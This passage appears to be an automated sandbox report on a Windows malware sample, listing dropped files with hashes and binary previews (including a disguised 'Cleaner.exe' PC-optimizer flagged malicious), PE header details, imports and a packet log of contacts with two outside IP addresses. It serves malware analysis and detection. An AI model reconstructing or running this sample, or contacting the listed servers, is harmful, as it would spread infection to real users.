SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\fuckingdllENCR[1].dll

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	94224
Entropy (8bit):	7.998072640845361
Encrypted:	true
SSDEEP:	1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
MD5:	418619EA97671304AF80EC60F5A50B62
SHA1:	F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
SHA-256:	EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
SHA-512:	F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
Malicious:	false
Preview:	...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.\|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..\|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=\|....'....[1.~.YB:./...A`...=..F..K...........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\ping[1].htm

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\library[1].htm

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\soft[1]

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3947920
Entropy (8bit):	7.275018147968825
Encrypted:	false
SSDEEP:	49152:+/PD/DL/D9CuZrr2h60qPPB+lJJkF9IC966eB+lJJkF9IC966eB+lJJkF9IC966h:+3D///UUrP43m8C/3m8C/3m8C5
MD5:	04514BD4962F7D60679434E0EBE49184
SHA1:	1493A5447EB8156A7D7AECFF60EE8BFBA2209526
SHA-256:	C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
SHA-512:	A71C7ED5DFDDA22F095DC99B16E8342A42E3361BE16E0241DBF8983DD0D5F6E90EB0299AAC1815CF78AD3A9F15FA89B42B720B7F818EE5F502300F102EF4C93E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ... ....@.. .......................`............`.................................T...O.... ..2............(<......@......8................................................ ............... ..H............text........ ...................... ..`.rsrc...2.... ......................@..@.reloc.......@......................@..B........................H.......h...@E......T........;............................................(......(.....~....-.r...p.....(....o....s.........~.....~...........j(....r=..p~....o....t....j(....rM..p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t.....~......(....Vs....(....t.........N.(.....(.....(........0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\ping[1].htm

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.1751231351134614
Encrypted:	false
SSDEEP:	3:nCmxEl:Cmc
MD5:	064DB2A4C3D31A4DC6AA2538F3FE7377
SHA1:	8F877AE1873C88076D854425221E352CA4178DFA
SHA-256:	0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
SHA-512:	CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
Malicious:	false
Preview:	UwUoooIIrwgh24uuU

C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Bunifu_UI_v1.5.3.dll

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	242176
Entropy (8bit):	6.47050397947197
Encrypted:	false
SSDEEP:	6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
MD5:	2ECB51AB00C5F340380ECF849291DBCF
SHA1:	1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
SHA-256:	F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
SHA-512:	E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Metadefender, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....:..s.....(...........2r...p(;...&Vr...p.....r...p.......(....>.........}.......(C.....o...(D...(E...}.....(F...(E...(G...&>.........}.......(C.....o...(D...}.....(F...(E...(H...&".......>.........}....R..} .....{ ...oo.....{ ..."..}!.....{!......}.....{#....{....op....{....,...{ ...oo.....{!...oo.....{....B.....su...(v.....{#....{#...

C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3947920
Entropy (8bit):	7.275018147968825
Encrypted:	false
SSDEEP:	49152:+/PD/DL/D9CuZrr2h60qPPB+lJJkF9IC966eB+lJJkF9IC966eB+lJJkF9IC966h:+3D///UUrP43m8C/3m8C/3m8C5
MD5:	04514BD4962F7D60679434E0EBE49184
SHA1:	1493A5447EB8156A7D7AECFF60EE8BFBA2209526
SHA-256:	C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
SHA-512:	A71C7ED5DFDDA22F095DC99B16E8342A42E3361BE16E0241DBF8983DD0D5F6E90EB0299AAC1815CF78AD3A9F15FA89B42B720B7F818EE5F502300F102EF4C93E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ... ....@.. .......................`............`.................................T...O.... ..2............(<......@......8................................................ ............... ..H............text........ ...................... ..`.rsrc...2.... ......................@..@.reloc.......@......................@..B........................H.......h...@E......T........;............................................(......(.....~....-.r...p.....(....o....s.........~.....~...........j(....r=..p~....o....t....j(....rM..p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t.....~......(....Vs....(....t.........N.(.....(.....(........0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

C:\Users\user\Desktop\Cleaner.lnk

Process:	C:\Users\user\Desktop\file.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Mon Oct 3 23:42:37 2022, mtime=Mon Oct 3 23:42:37 2022, atime=Mon Oct 3 23:42:37 2022, length=3947920, window=hide
Category:	dropped
Size (bytes):	2108
Entropy (8bit):	3.79203453899752
Encrypted:	false
SSDEEP:	24:8s9b97AO9Yz/cORKgKFEStqAy8a995P3hP3SO4ZDqP3j9U3S7aB6m:8cZ7ASYzUORgEStZC35PRPiZDqP5gB6
MD5:	F0F16C17D68F259E90BFDAEE49A6AF21
SHA1:	92237FCD627CC22BF0FE010D3AA078653315AB4E
SHA-256:	6099178FF02C6F2062431E8B5E2EC7B14FD577063208881A42E47943D98D9FF3
SHA-512:	6CA14DF652C28FBBE21310B11E6595479625CF3CEB7830768C3AD31C6D692A05AE405D4C3FC7852164A8E4956BB30F3EA56EDA84D51F017FBC588BB39E2A8A53
Malicious:	false
Preview:	L..................F.@.. .....T3......W3......W3.....=<..................... .:..DG..Yr?.D..U..k0.&...&........d.!-..`.0+......4........t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N..DU4......Y.....................t..A.p.p.D.a.t.a...B.P.1.....>Q.z..Local.<.......N..DU4......Y.....................V..L.o.c.a.l.....N.1.....DUJ...Temp..:.......N..DUJ......Y......................T.e.m.p.....b.1.....DUJ...GVBGWX~1..J......DUJ.DUJ......V......................g.V.b.g.w.X.d.N.t.g.M.n.....b.2..=<.DUS. .Cleaner.exe.H......DUS.DUS......V....................K.W.C.l.e.a.n.e.r...e.x.e.......l...............-.......k...........j .X.....C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe....O.p.t.i.m.i.z.e. .y.o.u.r. .P.C.......\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.g.V.b.g.w.X.d.N.t.g.M.n.\.C.l.e.a.n.e.r...e.x.e.=.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.g.V.b.g.w.X.d.N.t.g.M.n.\.C.l.e.a.n.e.r...e.x.e.........%USERPROFI

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.462227283357498
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	238080
MD5:	526fde9e61b1b4835885973331fa1616
SHA1:	ebbb0c3586b8a0244585eacb44ca125ac933ad8e
SHA256:	093741e4079a8092ba9d94653cb4f11c15fbe1e9ef53690e91628c61f0cc9440
SHA512:	ceff6066cd30ead43c4afcdc1b227ae114d4174fb75ff68c1495cbc6ef7bcb158bf2535669bd9add353e72ed3b97df48a9ad4cf21941db9d702d6f786bbae318
SSDEEP:	6144:oKFyXCCNTdMc9uzUCEJ/z1qWYHR+qvkqs3PZ5E:NFoC+ZUzl+RWR+1qs/s
TLSH:	7B34F1123CD18932C93E74718C71CA5277BFB8816672D94A76FC1AAE5F626C06E30397
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}...............N1......N'.................D....N ......N0......N5.....Rich............PE..L.....Mb...........................

File Icon


Icon Hash:	3370686068686869

Static PE Info

General

Entrypoint:	0x404be7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x624D8102 [Wed Apr 6 12:01:06 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	c9c09dee9cb4e9617f155f42be2e2cc0

Entrypoint Preview

Instruction
call 00007F8CE8759A6Bh
jmp 00007F8CE87565FDh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F8CE87567A6h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F8CE87567D0h
test ecx, 00000003h
jne 00007F8CE8756771h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F8CE875676Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F8CE87567B4h
test ah, ah
je 00007F8CE87567A6h
test eax, 00FF0000h
je 00007F8CE8756795h
test eax, FF000000h
je 00007F8CE8756784h
jmp 00007F8CE875674Fh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
cmp ecx, dword ptr [00435A7Ch]
jne 00007F8CE8756784h
rep ret
jmp 00007F8CE8759A53h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe0ec	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x191000	0x4bf8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1210	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2c78	0x18	.text
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2c30	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1d8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xdbe4	0xdc00	False	0.4849609375	data	5.899490920975358	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xf000	0x181d1c	0x27600	False	0.9495845734126984	data	7.865940586372942	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x191000	0x4bf8	0x4c00	False	0.5913342927631579	data	5.603732133139699	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1912b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
RT_ICON	0x191b58	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216
RT_ICON	0x194100	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096
RT_STRING	0x1953a8	0x42	data
RT_STRING	0x1953f0	0x280	data
RT_STRING	0x195670	0x3ce	data
RT_STRING	0x195a40	0x1b2	data
RT_ACCELERATOR	0x1951d8	0x80	data
RT_GROUP_ICON	0x1951a8	0x30	data
RT_VERSION	0x195268	0x140	MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
None	0x195258	0xa	data

Imports

DLL	Import
KERNEL32.dll	LoadLibraryA, InterlockedPushEntrySList, GetConsoleAliasesA, ReadFile, ReadConsoleW, GetVolumeInformationA, GetComputerNameA, LocalFree, InterlockedDecrement, SetSystemTimeAdjustment, SetLocaleInfoA, FindNextVolumeA, FindNextChangeNotification, CopyFileExA, MoveFileWithProgressW, VerifyVersionInfoW, LocalSize, FileTimeToDosDateTime, DebugBreak, GlobalGetAtomNameA, IsBadWritePtr, FindResourceA, GetComputerNameExA, GetProcAddress, GetStringTypeW, GetFileTime, GetConsoleAliasesLengthW, GetVolumeNameForVolumeMountPointA, DeleteVolumeMountPointA, GetCPInfo, GetQueuedCompletionStatus, MoveFileWithProgressA, CopyFileA, lstrcpynW, WriteConsoleW, GetBinaryTypeW, WriteConsoleOutputA, GetCommandLineA, InterlockedIncrement, CreateActCtxW, FormatMessageA, GetModuleHandleW, GetModuleHandleA, EnterCriticalSection, GetStringTypeExA, OpenMutexW, FindResourceW, RtlCaptureContext, InterlockedExchange, InitializeCriticalSectionAndSpinCount, DeleteFiber, InterlockedExchangeAdd, EnumDateFormatsA, GetPrivateProfileStructA, GetNamedPipeHandleStateW, RegisterWaitForSingleObject, LocalAlloc, QueryMemoryResourceNotification, SetLastError, GetProcessPriorityBoost, GetMailslotInfo, HeapWalk, SetFilePointer, SetConsoleMode, RaiseException, RtlUnwind, GetLastError, MoveFileA, DeleteFileA, GetStartupInfoA, HeapAlloc, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, LCMapStringA, LCMapStringW
USER32.dll	CharUpperBuffW
WINHTTP.dll	WinHttpCreateUrl

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2022 17:42:17.356427908 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:42:17.383599997 CEST	80	49710	208.67.104.97	192.168.2.6
Oct 3, 2022 17:42:17.383812904 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:42:17.386774063 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:42:17.413696051 CEST	80	49710	208.67.104.97	192.168.2.6
Oct 3, 2022 17:42:19.242346048 CEST	80	49710	208.67.104.97	192.168.2.6
Oct 3, 2022 17:42:19.242492914 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:42:20.319062948 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.346203089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.346492052 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.348063946 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.375190973 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375627995 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375648975 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375668049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375686884 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375704050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375720978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375737906 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375756979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375758886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.375775099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375793934 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375802994 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.375824928 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.375883102 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.402920961 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.402972937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403003931 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403034925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403064013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403094053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403120995 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403122902 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403172016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403172016 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403194904 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403202057 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403225899 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403232098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403245926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403263092 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403274059 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403292894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403321028 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403321028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403343916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403351068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403366089 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403381109 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403390884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403409958 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403424978 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403439045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403449059 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403467894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403480053 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403497934 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403511047 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403527021 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403537989 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403568029 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.430773973 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430810928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430833101 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430860043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430892944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430913925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430936098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430952072 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430974007 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430974007 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.430995941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431014061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431032896 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431039095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431058884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431062937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431086063 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431091070 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431108952 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431124926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431144953 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431154966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431173086 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431178093 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431200027 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431212902 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431221962 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431231022 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431245089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431251049 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431267977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431272030 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431289911 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431302071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431310892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431325912 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431334019 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431355953 CEST	80	49711	85.31.46.167	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2022 17:43:01.238493919 CEST	56331	53	192.168.2.6	8.8.8.8
